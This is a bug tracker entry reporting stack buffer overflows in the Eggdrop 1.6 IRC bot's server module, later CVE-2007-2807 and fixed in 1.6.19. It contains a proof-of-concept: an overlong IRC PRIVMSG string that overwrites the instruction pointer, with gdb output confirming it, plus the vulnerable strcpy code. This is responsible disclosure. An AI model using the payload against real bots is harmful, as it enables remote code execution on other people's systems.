First Last Prev Next    No search results available
Details
: multiple buffer overflows in server module
Bug#: 462
: Eggdrop 1.6
: Module: server.mod
Status: CLOSED
Resolution: FIXED
: All
: All
: 1.6.18
: P2
: normal
:
:
:
  Show dependency tree - Show dependency graph
People
Reporter: Bow Sineath <bow.sineath@gmail.com>
Assigned To: Eggheads Development <eggdev@eggheads.org>
:

Attachments
Add an attachment (proposed patch, testcase, etc.)


Note

You need to log in before you can comment on or make changes to this bug.

Related actions

Description:   Opened: 2007-04-19 21:56 
This email was sent to bugs@ several days ago, I thought it was worth posting
here. I searched and didn't see where anyone else had reported it
(surprisingly). Here goes:

I was taking a quick look at some of the code behind the eggie server module and
I ran across a few stack based overflows. I am incredibly surprised that no one
has reported these yet.

It seems that you are relying on the fact that the server the bot is connected
to is sane and not malicious, but I was able to exploit these flaws by opening a
netcat listener and connecting the bot to it, then sending whatever string I
needed to.

For example:

static int gotmsg(char *from, char *msg)
{
  char *to, buf[UHOSTLEN], *nick, ctcpbuf[512], *uhost = buf, *ctcp,
       *p, *p1, *code;

.......

ignoring = match_ignore(from);
  to = newsplit(&msg);
  fixcolon(msg);
  /* Only check if flood-ctcp is active */
  strcpy(uhost, from);

By sending the following string:

:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAABBBB PRIVMSG Lamestbot :test

(thats 368 bytes)

gdb output:

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 14990]
0x42424242 in ?? ()
(gdb) i r $eip
eip            0x42424242       0x42424242

You overwrite the instruction pointer with 0x42424242. It should be obvious that
this could allow remote code execution as well. I didn't spend too much time
looking at the rest of the code, this just happened to catch my eye while I was
glancing over it. I did notice a few others that were along the same lines as
this, but I didn't test them or document them, although I would be happy to do
if you want more information.

Given the fact that you have to convince someone to connect to a malicious
server, this isn't -THAT- serious, but if someone had the proper console
permissions or was able to coerce someone to connect their eggdrop to a 
malicious server, then it could result in a compromise.
------- Comment #1 From Nico Golde 2007-08-12 11:13:32 ------- 
http://nion.modprobe.de/01_CVE-2007-2807_servmsg.patch should fix it
------- Comment #2 From Tothwolf 2008-10-31 12:53:41 ------- 
CVE-2007-2807

Secunia Advisory SA25276
------- Comment #3 From Tothwolf 2008-10-31 12:54:20 ------- 
Fixed in version 1.6.19
First Last Prev Next    No search results available